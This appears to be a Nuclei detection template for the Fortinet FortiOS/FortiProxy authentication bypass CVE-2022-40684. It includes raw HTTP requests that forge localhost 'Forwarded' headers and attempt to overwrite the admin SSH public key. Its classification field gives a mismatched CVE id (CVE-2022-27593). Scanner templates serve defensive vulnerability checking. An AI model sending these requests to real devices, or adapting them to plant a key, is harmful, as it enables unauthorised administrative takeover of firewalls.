id: CVE-2022-40684

info:
  name: Fortigate - Authentication bypass
  author: Shockwave,nagli,carlosvieira
  severity: critical
  description: |
    Enables an unauthenticated remote attacker to use administrative interfaces by sending specially crafted HTTP or HTTPS requests, allowing them to log in to various products of Fortinet that are unpatched.
  reference:
    - https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py
    - https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/
    - https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
  classification:
    cvss-score: 9.6
    cve-id: CVE-2022-27593
  tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev

requests:
  - raw:
      - |
        GET /api/v2/cmdb/system/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Node.js
        Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=
        X-Forwarded-Vdom: root

      - |
        PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Report Runner
        Content-Type: application/json
        Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
        Content-Length: 610

        {
           "ssh-public-key1":"{{randstr}}"
        }

    stop-at-first-match: true
    req-condition: true
    matchers-condition: or
    matchers:
      - type: word
        part: body_1
        words:
          - "ENC XXXX"
          - "http_method"
        condition: and

      - type: word
        part: body_2
        words:
          - 'Invalid SSH public key.'
          - 'cli_error'
        condition: and